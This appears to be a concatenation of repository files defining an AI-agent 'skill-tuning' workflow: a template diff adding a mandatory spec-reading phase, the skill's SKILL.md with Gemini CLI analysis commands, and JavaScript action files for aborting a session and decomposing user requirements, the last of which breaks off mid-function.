> **⛔ Do not skip**: You **must** read the following documents in full before performing any operation. Executing without studying the specs will produce output that fails the quality standards.
{{mandatory_prerequisites}}
---
## Execution Flow
{{execution_flow}}
@@ -71,9 +81,10 @@ Bash(\`mkdir -p "\${workDir}"\`);
| `{{description}}` | string | config.description |
| `{{triggers}}` | string | config.triggers.join(", ") |
| `{{allowed_tools}}` | string | config.allowed_tools.join(", ") |
| `{{architecture_diagram}}` | string | Generated from execution_mode |
| `{{architecture_diagram}}` | string | Generated from execution_mode (includes Phase 0) |
| `{{design_principles}}` | string | Generated from execution_mode |
| `{{execution_flow}}` | string | Generated from phases/actions |
| `{{mandatory_prerequisites}}` | string | List of required pre-reading documents (specs + templates) |
| `{{execution_flow}}` | string | Generated from phases/actions (Phase 0 first) |
| `{{output_location}}` | string | config.output.location |
| `{{additional_dirs}}` | string | Generated from execution_mode |
| `{{output_structure}}` | string | Generated from config |
@@ -84,21 +95,48 @@ Bash(\`mkdir -p "\${workDir}"\`);
```javascript
function generateSkillMd(config) {
const template = Read('templates/skill-md.md');
return template
.replace(/\{\{skill_name\}\}/g, config.skill_name)
.replace(/\{\{display_name\}\}/g, config.display_name)
.replace(/\{\{description\}\}/g, config.description)
.replace(/\{\{triggers\}\}/g, config.triggers.map(t => `"${t}"`).join(", "))
.replace(/\{\{allowed_tools\}\}/g, config.allowed_tools.join(", "))
.replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config))
.replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config)) // includes Phase 0
.replace(/\{\{design_principles\}\}/g, generatePrinciples(config))
.replace(/\{\{execution_flow\}\}/g, generateFlow(config))
.replace(/\{\{mandatory_prerequisites\}\}/g, generatePrerequisites(config)) // mandatory prerequisites
.replace(/\{\{execution_flow\}\}/g, generateFlow(config)) // Phase 0 first
.replace(/\{\{output_location\}\}/g, config.output.location)
.replace(/\{\{additional_dirs\}\}/g, generateAdditionalDirs(config))
.replace(/\{\{output_structure\}\}/g, generateOutputStructure(config))
.replace(/\{\{reference_table\}\}/g, generateReferenceTable(config));
}
// Generate the mandatory-prerequisites table
function generatePrerequisites(config) {
const specs = config.specs || [];
const templates = config.templates || [];
let result = '### Core Specs (Required)\n\n';
result += '| Document | Purpose | Priority |\n';
result += '|----------|---------|----------|\n';
specs.forEach((spec, index) => {
const priority = index === 0 ? '**P0 - Highest**' : 'P1';
result += `| [${spec.path}](${spec.path}) | ${spec.purpose} | ${priority} |\n`;
});
if (templates.length > 0) {
result += '\n### Templates (Read Before Generating)\n\n';
result += '| Document | Purpose |\n';
result += '|----------|---------|\n';
templates.forEach(tmpl => {
result += `| [${tmpl.path}](${tmpl.path}) | ${tmpl.purpose} |\n`;
});
}
return result;
}
```
## Sequential Mode Example
@@ -118,6 +156,9 @@ Generate API documentation from source code.
\`\`\`
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification → Read and understand the design spec (mandatory) │
│             Study                                               │
│ ↓ │
│ Phase 1: Scanning → endpoints.json │
│ ↓ │
│ Phase 2: Parsing → schemas.json │
@@ -125,6 +166,22 @@ Generate API documentation from source code.
│ Phase 3: Generation → api-docs.md │
└─────────────────────────────────────────────────────────────────┘
\`\`\`
## ⚠️ Mandatory Prerequisites
> **⛔ Do not skip**: Read the following documents in full before performing any operation.
### Core Specs (Required)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/api-standards.md](specs/api-standards.md) | API documentation standards spec | **P0 - Highest** |
### Templates (Read Before Generating)
| Document | Purpose |
|----------|---------|
| [templates/endpoint-doc.md](templates/endpoint-doc.md) | Endpoint documentation template |
```
## Autonomous Mode Example
@@ -144,6 +201,10 @@ Interactive task management with CRUD operations.
\`\`\`
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification Study (mandatory)                     │
└───────────────┬─────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ Orchestrator (state-driven decisions)                           │
└───────────────┬─────────────────────────────────────────────────┘
@@ -153,4 +214,22 @@ Interactive task management with CRUD operations.
│ List │ │Create │ │ Edit │ │Delete │
└───────┘ └───────┘ └───────┘ └───────┘
\`\`\`
## ⚠️ Mandatory Prerequisites
> **⛔ Do not skip**: Read the following documents in full before performing any operation.
### Core Specs (Required)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/task-schema.md](specs/task-schema.md) | Task data-structure spec | **P0 - Highest** |
| [specs/action-catalog.md](specs/action-catalog.md) | Action catalog | P1 |
### Templates (Read Before Generating)
| Document | Purpose |
|----------|---------|
| [templates/orchestrator-base.md](templates/orchestrator-base.md) | Orchestrator template |
| [templates/action-base.md](templates/action-base.md) | Action template |
```


@@ -0,0 +1,303 @@
---
name: skill-tuning
description: Universal skill diagnosis and optimization tool. Detect and fix skill execution issues including context explosion, long-tail forgetting, data flow disruption, and agent coordination failures. Supports Gemini CLI for deep analysis. Triggers on "skill tuning", "tune skill", "skill diagnosis", "optimize skill", "skill debug".
allowed-tools: Task, AskUserQuestion, Read, Write, Bash, Glob, Grep, mcp__ace-tool__search_context
---
# Skill Tuning
Universal skill diagnosis and optimization tool that identifies and resolves skill execution problems through iterative multi-agent analysis.
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ Skill Tuning Architecture (Autonomous Mode + Gemini CLI) │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│  ⚠️ Phase 0: Specification → Read specs + understand the target skill's structure (mandatory) │
│ Study │
│ ↓ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│  │ Orchestrator (state-driven decisions)                                 │ │
│  │ Read diagnosis state → pick next action → execute → update state → loop until done │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
│ │ │
│ ┌────────────┬───────────┼───────────┬────────────┬────────────┐ │
│ ↓ ↓ ↓ ↓ ↓ ↓ │
│ ┌──────┐ ┌──────────┐ ┌─────────┐ ┌────────┐ ┌────────┐ ┌─────────┐ │
│ │ Init │→ │ Analyze │→ │Diagnose │ │Diagnose│ │Diagnose│ │ Gemini │ │
│ │ │ │Requiremts│ │ Context │ │ Memory │ │DataFlow│ │Analysis │ │
│ └──────┘ └──────────┘ └─────────┘ └────────┘ └────────┘ └─────────┘ │
│ │ │ │ │ │ │
│ │ └───────────┴───────────┴────────────┘ │
│ ↓ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│ │ Requirement Analysis (NEW) │ │
│  │ • Phase 1: Dimension decomposition (Gemini CLI) - one description → multiple concern dimensions │ │
│  │ • Phase 2: Spec matching - each dimension → taxonomy + strategy       │ │
│  │ • Phase 3: Coverage assessment - "has a fix strategy" is the bar      │ │
│  │ • Phase 4: Ambiguity detection - flag ambiguous descriptions; request clarification when needed │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────┐ │
│ │ Apply Fixes + │ │
│ │ Verify Results │ │
│ └──────────────────┘ │
│ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│ │ Gemini CLI Integration │ │
│  │ Invoke the Gemini CLI on demand for deep analysis, driven by user needs: │ │
│  │ • Requirement decomposition                                           │ │
│  │ • Complex problem analysis (prompt engineering, architecture review)  │ │
│  │ • Code pattern recognition (pattern matching, anti-pattern detection) │ │
│  │ • Fix strategy generation (fix generation, refactoring suggestions)   │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
```
## Problem Domain
Based on comprehensive analysis, skill-tuning addresses **core skill issues** and **general optimization areas**:
### Core Skill Issues (Auto-Detected)
| Priority | Problem | Root Cause | Solution Strategy |
|----------|---------|------------|-------------------|
| **P0** | Authoring Principles Violation | Intermediate-file storage, state bloat, file-based handoffs | eliminate_intermediate_files, minimize_state, context_passing |
| **P1** | Data Flow Disruption | Scattered state, inconsistent formats | state_centralization, schema_enforcement |
| **P2** | Agent Coordination | Fragile call chains, merge complexity | error_wrapping, result_validation |
| **P3** | Context Explosion | Token accumulation, multi-turn bloat | sliding_window, context_summarization |
| **P4** | Long-tail Forgetting | Early constraint loss | constraint_injection, checkpoint_restore |
| **P5** | Token Consumption | Verbose prompts, excessive state, redundant I/O | prompt_compression, lazy_loading, output_minimization |
### General Optimization Areas (On-Demand Analysis via Gemini CLI)
| Category | Issues | Gemini Analysis Scope |
|----------|--------|----------------------|
| **Prompt Engineering** | Vague instructions, inconsistent output formats, hallucination risk | Prompt optimization, structured output design |
| **Architecture** | Poor phase decomposition, tangled dependencies, weak extensibility | Architecture review, modularization advice |
| **Performance** | Slow execution, high token consumption, redundant computation | Performance analysis, caching strategy |
| **Error Handling** | Poor error recovery, no degradation strategy, insufficient logging | Fault-tolerant design, better observability |
| **Output Quality** | Unstable output, format drift, quality fluctuation | Quality gates, verification mechanisms |
| **User Experience** | Clunky interaction, unclear feedback, invisible progress | UX optimization, progress tracking |
## Key Design Principles
1. **Problem-First Diagnosis**: Systematic identification before any fix attempt
2. **Data-Driven Analysis**: Record execution traces, token counts, state snapshots
3. **Iterative Refinement**: Multiple tuning rounds until quality gates pass
4. **Non-Destructive**: All changes are reversible with backup checkpoints
5. **Agent Coordination**: Use specialized sub-agents for each diagnosis type
6. **Gemini CLI On-Demand**: Deep analysis via CLI for complex/custom issues
---
## Gemini CLI Integration
Invokes the Gemini CLI on demand for deep analysis, driven by user needs.
### Trigger Conditions
| Condition | Action | CLI Mode |
|-----------|--------|----------|
| User describes a complex problem | Invoke Gemini to analyze the root cause | `analysis` |
| Auto-diagnosis finds a critical issue | Request deep analysis to confirm | `analysis` |
| User requests an architecture review | Run the architecture analysis | `analysis` |
| Fix code needs to be generated | Generate a fix proposal | `write` |
| Standard strategies don't apply | Request a customized strategy | `analysis` |
### CLI Command Template
```bash
ccw cli -p "
PURPOSE: ${purpose}
TASK: ${task_steps}
MODE: ${mode}
CONTEXT: @${skill_path}/**/*
EXPECTED: ${expected_output}
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/${mode}-protocol.md) | ${constraints}
" --tool gemini --mode ${mode} --cd ${skill_path}
```
### Analysis Types
#### 1. Problem Root Cause Analysis
```bash
ccw cli -p "
PURPOSE: Identify root cause of skill execution issue: ${user_issue_description}
TASK: • Analyze skill structure and phase flow • Identify anti-patterns • Trace data flow issues
MODE: analysis
CONTEXT: @**/*.md
EXPECTED: JSON with { root_causes: [], patterns_found: [], recommendations: [] }
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Focus on execution flow
" --tool gemini --mode analysis
```
#### 2. Architecture Review
```bash
ccw cli -p "
PURPOSE: Review skill architecture for scalability and maintainability
TASK: • Evaluate phase decomposition • Check state management patterns • Assess agent coordination
MODE: analysis
CONTEXT: @**/*.md
EXPECTED: Architecture assessment with improvement recommendations
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Focus on modularity
" --tool gemini --mode analysis
```
#### 3. Fix Strategy Generation
```bash
ccw cli -p "
PURPOSE: Generate fix strategy for issue: ${issue_id} - ${issue_description}
TASK: • Analyze issue context • Design fix approach • Generate implementation plan
MODE: analysis
CONTEXT: @**/*.md
EXPECTED: JSON with { strategy: string, changes: [], verification_steps: [] }
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Minimal invasive changes
" --tool gemini --mode analysis
```
---
## Mandatory Prerequisites
> **CRITICAL**: Read these documents before executing any action.
### Core Specs (Required)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/skill-authoring-principles.md](specs/skill-authoring-principles.md) | **Primary principles: concise and efficient, eliminate intermediate storage, pass data through context** | **P0** |
| [specs/problem-taxonomy.md](specs/problem-taxonomy.md) | Problem classification and detection patterns | **P0** |
| [specs/tuning-strategies.md](specs/tuning-strategies.md) | Fix strategies for each problem type | **P0** |
| [specs/dimension-mapping.md](specs/dimension-mapping.md) | Dimension to Spec mapping rules | **P0** |
| [specs/quality-gates.md](specs/quality-gates.md) | Quality thresholds and verification criteria | P1 |
### Templates (Reference)
| Document | Purpose |
|----------|---------|
| [templates/diagnosis-report.md](templates/diagnosis-report.md) | Diagnosis report structure |
| [templates/fix-proposal.md](templates/fix-proposal.md) | Fix proposal format |
---
## Execution Flow
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ Phase 0: Specification Study (mandatory prerequisite - do not skip)         │
│   → Read: specs/problem-taxonomy.md (problem taxonomy)                      │
│   → Read: specs/tuning-strategies.md (tuning strategies)                    │
│   → Read: specs/dimension-mapping.md (dimension mapping rules)              │
│ → Read: Target skill's SKILL.md and phases/*.md │
│   → Output: Internalize specs; understand target skill structure            │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-init: Initialize Tuning Session │
│ → Create work directory: .workflow/.scratchpad/skill-tuning-{timestamp} │
│ → Initialize state.json with target skill info │
│ → Create backup of target skill files │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-analyze-requirements: Requirement Analysis │
│   → Phase 1: Dimension split (Gemini CLI): description → focus dimensions   │
│   → Phase 2: Spec matching - each dimension → taxonomy + strategy           │
│   → Phase 3: Coverage evaluation - "has a fix strategy" = satisfied         │
│   → Phase 4: Ambiguity detection - request clarification when needed        │
│ → Output: state.json (requirement_analysis field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-diagnose-*: Diagnosis Actions (context/memory/dataflow/agent/docs/ │
│ token_consumption) │
│ → Execute pattern-based detection for each category │
│ → Output: state.json (diagnosis.{category} field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-generate-report: Consolidated Report │
│ → Generate markdown summary from state.diagnosis │
│ → Prioritize issues by severity │
│ → Output: state.json (final_report field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-propose-fixes: Fix Proposal Generation │
│ → Generate fix strategies for each issue │
│ → Create implementation plan │
│ → Output: state.json (proposed_fixes field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-apply-fix: Apply Selected Fix │
│ → User selects fix to apply │
│ → Execute fix with backup │
│ → Update state with fix result │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-verify: Verification │
│ → Re-run affected diagnosis │
│ → Check quality gates │
│ → Update iteration count │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-complete: Finalization │
│ → Set status='completed' │
│ → Final report already in state.json (final_report field) │
│ → Output: state.json (final) │
└─────────────────────────────────────────────────────────────────────────────┘
```
## Directory Setup
```javascript
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
const workDir = `.workflow/.scratchpad/skill-tuning-${timestamp}`;
// Simplified: Only backups dir needed, diagnosis results go into state.json
Bash(`mkdir -p "${workDir}/backups"`);
```
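As a standalone check of the naming scheme, the timestamp logic above can be run in plain Node (no workflow APIs; `buildWorkDir` is a hypothetical helper wrapping the lines above):

```javascript
// Build the scratchpad path the same way as above, for a fixed date.
function buildWorkDir(date) {
  const timestamp = date.toISOString().slice(0, 19).replace(/[-:T]/g, '');
  return `.workflow/.scratchpad/skill-tuning-${timestamp}`;
}

console.log(buildWorkDir(new Date('2024-01-02T03:04:05Z')));
// → .workflow/.scratchpad/skill-tuning-20240102030405
```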
## Output Structure
```
.workflow/.scratchpad/skill-tuning-{timestamp}/
├── state.json # Single source of truth (all results consolidated)
│ ├── diagnosis.* # All diagnosis results embedded
│ ├── issues[] # Found issues
│ ├── proposed_fixes[] # Fix proposals
│ └── final_report # Markdown summary (on completion)
└── backups/
└── {skill-name}-backup/ # Original skill files backup
```
> **Token Optimization**: All outputs consolidated into state.json. No separate diagnosis files or report files.
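A minimal sketch of the read-modify-write pattern this consolidation implies - a hypothetical `updateState` helper over an in-memory store standing in for the workflow's Read/Write tools:

```javascript
// In-memory stand-in for state.json, illustrating single-file consolidation.
const store = { 'state.json': JSON.stringify({ status: 'running', diagnosis: {} }) };

function updateState(updates) {
  const state = JSON.parse(store['state.json']);
  Object.assign(state, updates); // shallow merge; a real version would deep-merge diagnosis.*
  store['state.json'] = JSON.stringify(state, null, 2);
  return state;
}

// Diagnosis results are embedded in state.json instead of separate files:
updateState({ diagnosis: { context: { issues_found: 2, severity: 'medium' } } });
```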
## State Schema
See [phases/state-schema.md](phases/state-schema.md) for the detailed state structure definition.
Core state fields:
- `status`: workflow status (pending/running/completed/failed)
- `target_skill`: target skill information
- `diagnosis`: per-dimension diagnosis results
- `issues`: list of discovered issues
- `proposed_fixes`: proposed fix plans
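A skeletal state object consistent with these fields (values illustrative only; phases/state-schema.md is authoritative):

```javascript
// Illustrative initial state; field names follow phases/state-schema.md.
const state = {
  status: 'pending',                                            // pending | running | completed | failed
  target_skill: { name: 'my-skill', path: 'skills/my-skill' },  // hypothetical target
  diagnosis: {},                                                // per-dimension diagnosis results
  issues: [],                                                   // discovered issues
  proposed_fixes: []                                            // proposed fix plans
};
console.log(state.status);
```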
## Reference Documents
| Document | Purpose |
|----------|---------|
| [phases/orchestrator.md](phases/orchestrator.md) | Orchestrator decision logic |
| [phases/state-schema.md](phases/state-schema.md) | State structure definition |
| [phases/actions/action-init.md](phases/actions/action-init.md) | Initialize tuning session |
| [phases/actions/action-analyze-requirements.md](phases/actions/action-analyze-requirements.md) | Requirement analysis (NEW) |
| [phases/actions/action-diagnose-context.md](phases/actions/action-diagnose-context.md) | Context explosion diagnosis |
| [phases/actions/action-diagnose-memory.md](phases/actions/action-diagnose-memory.md) | Long-tail forgetting diagnosis |
| [phases/actions/action-diagnose-dataflow.md](phases/actions/action-diagnose-dataflow.md) | Data flow diagnosis |
| [phases/actions/action-diagnose-agent.md](phases/actions/action-diagnose-agent.md) | Agent coordination diagnosis |
| [phases/actions/action-diagnose-docs.md](phases/actions/action-diagnose-docs.md) | Documentation structure diagnosis |
| [phases/actions/action-diagnose-token-consumption.md](phases/actions/action-diagnose-token-consumption.md) | Token consumption diagnosis |
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | Report generation |
| [phases/actions/action-propose-fixes.md](phases/actions/action-propose-fixes.md) | Fix proposal |
| [phases/actions/action-apply-fix.md](phases/actions/action-apply-fix.md) | Fix application |
| [phases/actions/action-verify.md](phases/actions/action-verify.md) | Verification |
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | Finalization |
| [specs/problem-taxonomy.md](specs/problem-taxonomy.md) | Problem classification |
| [specs/tuning-strategies.md](specs/tuning-strategies.md) | Fix strategies |
| [specs/dimension-mapping.md](specs/dimension-mapping.md) | Dimension to Spec mapping (NEW) |
| [specs/quality-gates.md](specs/quality-gates.md) | Quality criteria |

# Action: Abort
Abort the tuning session due to unrecoverable errors.
## Purpose
- Safely terminate on critical failures
- Preserve diagnostic information for debugging
- Ensure backup remains available
- Notify user of failure reason
## Preconditions
- [ ] state.error_count >= state.max_errors
- [ ] OR critical failure detected
## Execution
```javascript
async function execute(state, workDir) {
console.log('Aborting skill tuning session...');
const errors = state.errors;
const targetSkill = state.target_skill;
// Generate abort report
const abortReport = `# Skill Tuning Aborted
**Target Skill**: ${targetSkill?.name || 'Unknown'}
**Aborted At**: ${new Date().toISOString()}
**Reason**: Too many errors or critical failure
---
## Error Log
${errors.length === 0 ? '_No errors recorded_' :
errors.map((err, i) => `
### Error ${i + 1}
- **Action**: ${err.action}
- **Message**: ${err.message}
- **Time**: ${err.timestamp}
- **Recoverable**: ${err.recoverable ? 'Yes' : 'No'}
`).join('\n')}
---
## Session State at Abort
- **Status**: ${state.status}
- **Iteration Count**: ${state.iteration_count}
- **Completed Actions**: ${state.completed_actions.length}
- **Issues Found**: ${state.issues.length}
- **Fixes Applied**: ${state.applied_fixes.length}
---
## Recovery Options
### Option 1: Restore Original Skill
If any changes were made, restore from backup:
\`\`\`bash
cp -r "${state.backup_dir}/${targetSkill?.name || 'backup'}-backup"/* "${targetSkill?.path || 'target'}/"
\`\`\`
### Option 2: Resume from Last State
The session state is preserved at:
\`${workDir}/state.json\`
To resume:
1. Fix the underlying issue
2. Reset error_count in state.json
3. Re-run skill-tuning with --resume flag
### Option 3: Manual Investigation
Review the following files:
- Diagnosis results: \`${workDir}/diagnosis/*.json\`
- Error log: \`${workDir}/errors.json\`
- State snapshot: \`${workDir}/state.json\`
---
## Diagnostic Information
### Last Successful Action
${state.completed_actions.length > 0 ? state.completed_actions[state.completed_actions.length - 1] : 'None'}
### Current Action When Failed
${state.current_action || 'Unknown'}
### Partial Diagnosis Results
- Context: ${state.diagnosis.context ? 'Completed' : 'Not completed'}
- Memory: ${state.diagnosis.memory ? 'Completed' : 'Not completed'}
- Data Flow: ${state.diagnosis.dataflow ? 'Completed' : 'Not completed'}
- Agent: ${state.diagnosis.agent ? 'Completed' : 'Not completed'}
---
*Skill tuning aborted - please review errors and retry*
`;
// Write abort report
Write(`${workDir}/abort-report.md`, abortReport);
// Save error log
Write(`${workDir}/errors.json`, JSON.stringify(errors, null, 2));
// Notify user
await AskUserQuestion({
questions: [{
question: `Skill tuning aborted due to ${errors.length} errors. Would you like to restore the original skill?`,
header: 'Restore',
multiSelect: false,
options: [
{ label: 'Yes, restore', description: 'Restore original skill from backup' },
{ label: 'No, keep changes', description: 'Keep any partial changes made' }
]
}]
}).then(async response => {
if (response['Restore'] === 'Yes, restore') {
// Restore from backup
if (state.backup_dir && targetSkill?.path) {
Bash(`cp -r "${state.backup_dir}/${targetSkill.name}-backup"/* "${targetSkill.path}/"`);
console.log('Original skill restored from backup.');
}
}
}).catch(() => {
// User cancelled, don't restore
});
return {
stateUpdates: {
status: 'failed',
completed_at: new Date().toISOString()
},
outputFiles: [`${workDir}/abort-report.md`, `${workDir}/errors.json`],
summary: `Tuning aborted: ${errors.length} errors. Check abort-report.md for details.`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'failed',
completed_at: '<timestamp>'
}
};
```
## Output
- **File**: `abort-report.md`
- **Location**: `${workDir}/abort-report.md`
## Error Handling
This action should not fail - it's the final error handler.
## Next Actions
- None (terminal state)

# Action: Analyze Requirements
Decompose the user's problem description into multiple analysis dimensions, match each to a Spec, evaluate coverage, and detect ambiguities.
## Purpose
- Decompose a single user description into multiple independent focus dimensions
- Match each dimension to problem-taxonomy (detection) + tuning-strategies (fix)
- Judge whether the requirement is satisfied by the criterion "a fix strategy exists"
- Detect ambiguities and request user clarification when necessary
## Preconditions
- [ ] `state.status === 'running'`
- [ ] `state.target_skill !== null`
- [ ] `state.completed_actions.includes('action-init')`
- [ ] `!state.completed_actions.includes('action-analyze-requirements')`
## Execution
### Phase 1: Dimension Decomposition (Gemini CLI)
Call Gemini to semantically analyze the user description and decompose it into independent dimensions:
```javascript
async function analyzeDimensions(state, workDir) {
const prompt = `
PURPOSE: Analyze the user's problem description and decompose it into independent focus dimensions
TASK:
• Identify the distinct concerns in the user description (each concern should be independent and analyzable on its own)
• Extract keywords for each concern (Chinese or English)
• Infer the likely problem category:
- context_explosion: context / token related
- memory_loss: forgetting / lost constraints
- dataflow_break: state / data-flow related
- agent_failure: agent / subtask related
- prompt_quality: prompt / output quality related
- architecture: architecture / structure related
- performance: performance / efficiency related
- error_handling: error / exception handling related
- output_quality: output quality / verification related
- user_experience: interaction / experience related
• Rate the confidence of each inference (0-1)
INPUT:
User description: ${state.user_issue_description}
Target skill: ${state.target_skill.name}
Skill structure: ${JSON.stringify(state.target_skill.phases)}
MODE: analysis
CONTEXT: @specs/problem-taxonomy.md @specs/dimension-mapping.md
EXPECTED: JSON (no markdown code-fence markers)
{
"dimensions": [
{
"id": "DIM-001",
"description": "short description of the concern",
"keywords": ["keyword1", "keyword2"],
"inferred_category": "problem category",
"confidence": 0.85,
"reasoning": "rationale for the inference"
}
],
"analysis_notes": "overall analysis notes"
}
RULES:
- Each dimension must be independent and non-overlapping
- Inferences below 0.5 confidence should be flagged as needing clarification
- If the user description is very vague, extract at least one "general" dimension
`;
const cliCommand = `ccw cli -p "${escapeForShell(prompt)}" --tool gemini --mode analysis --cd "${state.target_skill.path}"`;
console.log('Phase 1: Running Gemini dimension decomposition...');
// Background execution: the orchestrator polls for completion before parsing the output.
const result = Bash({
command: cliCommand,
run_in_background: true,
timeout: 300000
});
return result;
}
```
### Phase 2: Spec Matching
Match each dimension to detection patterns and fix strategies based on the `specs/category-mappings.json` configuration:
```javascript
// Load the centralized mapping configuration
const mappings = JSON.parse(Read('specs/category-mappings.json'));
function matchSpecs(dimensions) {
return dimensions.map(dim => {
// Match a taxonomy detection pattern
const taxonomyMatch = findTaxonomyMatch(dim.inferred_category);
// Match a fix strategy
const strategyMatch = findStrategyMatch(dim.inferred_category);
// Satisfied when a fix strategy exists (the core criterion)
const hasFix = strategyMatch !== null && strategyMatch.strategies.length > 0;
return {
dimension_id: dim.id,
taxonomy_match: taxonomyMatch,
strategy_match: strategyMatch,
has_fix: hasFix,
needs_gemini_analysis: taxonomyMatch === null || mappings.categories[dim.inferred_category]?.needs_gemini_analysis
};
});
}
function findTaxonomyMatch(category) {
const config = mappings.categories[category];
if (!config || config.pattern_ids.length === 0) return null;
return {
category: category,
pattern_ids: config.pattern_ids,
severity_hint: config.severity_hint
};
}
function findStrategyMatch(category) {
const config = mappings.categories[category];
if (!config) {
// Fallback to custom from config
return mappings.fallback;
}
return {
strategies: config.strategies,
risk_levels: config.risk_levels
};
}
```
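The shape of `specs/category-mappings.json` assumed by these lookups, sketched as a literal - the field names are inferred from this action's code, so the real file may differ:

```javascript
// Hypothetical excerpt of specs/category-mappings.json, written as a JS literal.
const mappings = {
  categories: {
    context_explosion: {
      pattern_ids: ['CTX-001', 'CTX-002'],
      severity_hint: 'high',
      strategies: ['sliding_window', 'context_summarization'],
      risk_levels: ['low', 'medium'],
      needs_gemini_analysis: false
    }
  },
  fallback: { strategies: ['custom'], risk_levels: ['high'] }
};

// Same satisfaction criterion as matchSpecs: at least one fix strategy resolves.
const cfg = mappings.categories['context_explosion'] || mappings.fallback;
console.log(cfg.strategies.length > 0); // true
```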
### Phase 3: Coverage Evaluation
Evaluate Spec coverage across all dimensions:
```javascript
function evaluateCoverage(specMatches) {
const total = specMatches.length;
const withDetection = specMatches.filter(m => m.taxonomy_match !== null).length;
const withFix = specMatches.filter(m => m.has_fix).length;
const rate = total > 0 ? Math.round((withFix / total) * 100) : 0;
let status;
if (rate >= 80) {
status = 'satisfied';
} else if (rate >= 50) {
status = 'partial';
} else {
status = 'unsatisfied';
}
return {
total_dimensions: total,
with_detection: withDetection,
with_fix_strategy: withFix,
coverage_rate: rate,
status: status
};
}
```
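The 80% / 50% thresholds can be exercised directly; this trims `evaluateCoverage` to its satisfaction logic so the block runs standalone:

```javascript
// Trimmed restatement of evaluateCoverage: rate and status only.
function evaluateCoverage(specMatches) {
  const total = specMatches.length;
  const withFix = specMatches.filter(m => m.has_fix).length;
  const rate = total > 0 ? Math.round((withFix / total) * 100) : 0;
  const status = rate >= 80 ? 'satisfied' : rate >= 50 ? 'partial' : 'unsatisfied';
  return { coverage_rate: rate, status };
}

// 2 of 3 dimensions have a fix strategy → 67% → 'partial'
console.log(evaluateCoverage([{ has_fix: true }, { has_fix: true }, { has_fix: false }]));
```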
### Phase 4: Ambiguity Detection
Identify ambiguities that require user clarification:
```javascript
function detectAmbiguities(dimensions, specMatches) {
const ambiguities = [];
for (const dim of dimensions) {
const match = specMatches.find(m => m.dimension_id === dim.id);
// Check 1: low confidence (< 0.5)
if (dim.confidence < 0.5) {
ambiguities.push({
dimension_id: dim.id,
type: 'vague_description',
description: `Dimension "${dim.description}" is vaguely described; inference confidence is low (${dim.confidence})`,
possible_interpretations: suggestInterpretations(dim),
needs_clarification: true
});
}
// Check 2: no matching category
if (!match || (!match.taxonomy_match && !match.strategy_match)) {
ambiguities.push({
dimension_id: dim.id,
type: 'no_category_match',
description: `Dimension "${dim.description}" cannot be matched to any known problem category`,
possible_interpretations: ['custom'],
needs_clarification: true
});
}
// Check 3: conflicting keywords (may belong to multiple categories)
if (dim.keywords.length > 3 && hasConflictingKeywords(dim.keywords)) {
ambiguities.push({
dimension_id: dim.id,
type: 'conflicting_keywords',
description: `The keywords of dimension "${dim.description}" may point to several different problems`,
possible_interpretations: inferMultipleCategories(dim.keywords),
needs_clarification: true
});
}
}
return ambiguities;
}
function suggestInterpretations(dim) {
// Suggest likely interpretations based on the mappings configuration
const categories = Object.keys(mappings.categories).filter(
cat => cat !== 'authoring_principles_violation' // exclude the internal detection category
);
return categories.slice(0, 4); // return the 4 most common categories as options
}
function hasConflictingKeywords(keywords) {
// Check whether the keywords point in different directions
const categoryHints = keywords.map(k => getKeywordCategoryHint(k));
const uniqueCategories = [...new Set(categoryHints.filter(c => c))];
return uniqueCategories.length > 1;
}
function getKeywordCategoryHint(keyword) {
// Build a lookup table from mappings.keywords (merging Chinese and English keywords)
const keywordMap = {
...mappings.keywords.chinese,
...mappings.keywords.english
};
return keywordMap[keyword.toLowerCase()];
}
```
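With a toy keyword table standing in for `mappings.keywords`, the conflict check behaves as follows:

```javascript
// Toy lookup table; the real one merges mappings.keywords.chinese and .english.
const keywordMap = { token: 'context_explosion', forget: 'memory_loss' };

function hasConflictingKeywords(keywords) {
  const hints = keywords.map(k => keywordMap[k.toLowerCase()]);
  const unique = [...new Set(hints.filter(Boolean))];
  return unique.length > 1; // keywords resolve to more than one category
}

console.log(hasConflictingKeywords(['Token', 'forget']));  // true: two categories
console.log(hasConflictingKeywords(['token', 'unknown'])); // false: only one category resolves
```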
## User Interaction
If ambiguities that need clarification are detected, pause and ask the user:
```javascript
async function handleAmbiguities(ambiguities, dimensions) {
const needsClarification = ambiguities.filter(a => a.needs_clarification);
if (needsClarification.length === 0) {
return null; // no clarification needed
}
const questions = needsClarification.slice(0, 4).map(a => {
const dim = dimensions.find(d => d.id === a.dimension_id);
return {
question: `Regarding "${dim.description}", what exactly do you mean?`,
header: a.dimension_id,
options: a.possible_interpretations.map(interp => ({
label: getCategoryLabel(interp),
